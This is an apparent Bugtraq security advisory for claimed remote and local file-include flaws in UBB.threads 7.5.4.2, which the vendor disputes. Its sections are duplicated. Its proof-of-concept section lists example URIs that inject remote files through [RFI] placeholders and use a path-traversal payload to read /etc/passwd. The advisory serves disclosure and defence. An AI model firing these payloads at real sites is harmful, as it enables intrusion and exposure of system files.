UBB.threads Multiple File Include Vulnerabilities
BID:37205
Info
UBB.threads Multiple File Include Vulnerabilities
| Bugtraq ID: | 37205 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 04 2009 12:00AM |
| Updated: | Dec 09 2009 04:44PM |
| Credit: | R3VAN_BASTARD |
| Vulnerable: |
UBBCentral UBB.threads 7.5.4.2 |
| Not Vulnerable: | |
Discussion
UBB.threads Multiple File Include Vulnerabilities
UBB.threads is prone to multiple file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
UBB.threads 7.5.4.2 is vulnerable; other versions may also be affected.
UPDATE (December 7, 2009): The vendor disputes the claim that the product is vulnerable as described. We will update this BID as more information becomes available.
UBB.threads is prone to multiple file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
UBB.threads 7.5.4.2 is vulnerable; other versions may also be affected.
UPDATE (December 7, 2009): The vendor disputes the claim that the product is vulnerable as described. We will update this BID as more information becomes available.
Exploit / POC
UBB.threads Multiple File Include Vulnerabilities
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/path/ubb/libs/smarty/Smarty_Compiler.class.php?_plugins_params=[RFI]
http://www.example.com/path/ubb/libs/html.inc.php?[USER_LANGUAGE]=[RFI]
http://www.example.com/path/ubb/ubbthreads.php?file=../../../../../../../../etc/passwd%00
An attacker can exploit these issues via a browser.
The following example URIs are available:
http://www.example.com/path/ubb/libs/smarty/Smarty_Compiler.class.php?_plugins_params=[RFI]
http://www.example.com/path/ubb/libs/html.inc.php?[USER_LANGUAGE]=[RFI]
http://www.example.com/path/ubb/ubbthreads.php?file=../../../../../../../../etc/passwd%00
Solution / Fix
UBB.threads Multiple File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].